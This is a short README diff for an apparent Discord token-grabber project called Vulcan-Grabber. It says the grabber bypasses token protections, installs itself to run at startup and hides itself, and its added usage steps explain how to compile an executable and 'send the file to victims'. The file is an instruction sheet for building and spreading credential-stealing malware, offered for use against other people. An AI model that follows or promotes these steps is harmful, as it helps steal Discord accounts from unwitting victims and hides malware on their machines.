Maywitz/Vulcan-Grabber/README.md

 Yes, this token grabber bypasses token protector and betterdiscord.

 Yes, this token grabber attempts to add itself so it's run on computer startup, and hides itself after the program is run.

+# Usage

+1. Download the repository as a zip
+2. Extract the contents of the zip file into a seperate folder
+3. Run setup.bat
+4. Enter a name for your token logger
+5. Open the dist folder to find your compiled exe file
+6. Send the file to victims

+Make sure you have [python](https://python.org) installed!